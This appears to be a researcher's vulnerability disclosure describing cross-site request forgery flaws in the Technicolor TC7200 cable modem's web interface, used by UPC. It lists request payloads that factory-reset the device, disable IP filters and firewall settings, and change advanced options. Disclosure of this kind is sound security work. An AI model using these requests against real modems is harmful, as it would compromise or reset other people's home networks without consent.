Among other cable modems, UPC uses the Technicolor TC7200. The Technicolor TC7200 is a DOCSIS 3.0 dual band concurrent wireless Embedded Multimedia Terminal Adapter (EMTA).
After getting my hands on one of these modems I decided to test it for vulnerabilities in the web interface. As it turned out, the device had multiple vulnerabilities of which one is Cross Site Request Forgery.
Multiple Cross Site Request Forgery Vulnerabilities
It is possible to change the IP filtering options, the firewall settings and factory reset the device. It should be understood that it is also possible for an attacker to create an IP forwarding rule that enables remote access to the device.
It is possible to perform a Cross Site Request Forgery attack on any function within the web application since the origin of the request is not checked anywhere. The video above is only showing a few options that an attacker might be able to exploit. The following payloads are used in the video:
## Payload for Factory Reset:
POST : http://<ip>/goform/system/factory
## Payload to disable the advanced options:
POST : http://<ip>/goform/advanced/options
## Payload to remove ip-filters:
POST : http://<ip>/goform/advanced/ip-filters
Parameter: IpFilterAddressDelete1 = 1
## Payload to remove firewall settings
POST : http://<ip>/goform/advanced/firewall
Parameter: cbFirewall = 1